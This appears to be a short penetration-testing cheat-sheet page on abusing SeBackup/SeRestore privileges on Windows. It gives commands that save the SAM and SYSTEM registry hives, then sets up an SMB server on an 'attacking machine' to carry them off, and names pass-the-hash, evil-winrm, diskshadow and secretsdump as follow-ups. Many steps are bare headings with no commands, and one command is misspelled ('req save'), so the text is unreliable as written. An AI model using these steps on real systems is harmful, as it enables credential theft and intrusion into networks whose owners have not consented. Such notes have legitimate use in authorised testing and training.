githubEdit

Dump SAM and SYSTEM hives

Privileges: SeBackup/SeRestore

1: Backup SAM and SYSTEM hashes

cd /

mkdir temp

cd temp

req save hklm\system c:\temp\system

req save hklm\sam c:\temp\sam

download sam

download system

2: Create SMB Server on attacking machine

mkdir share

impacket-smbserver -smb2support -username USER -password PASSWORD public share

3: Copy backups to share folder

4: Retrieve hashes

OR

5: Pass-The-Hash Attack (PtH)

TIP: We can also use evil-winrm for PtH attacks.

Alternate Method to transfer the Hives: reg.py remotely on Linux

Alternate Method: SeBackupPrivilegeUtils https://github.com/giuliano108/SeBackupPrivilege

Usage:

Alternate Method: Robocopy

Alternate Method: diskshadow.exe

Create a script for diskshadow to execute

Copy the SAM/SYSTEM/SECURITY hives to our temp folder

Then download all of them to our machine

Dump hashes

1) Pypykatz

2) impacket-secretsdump

Last updated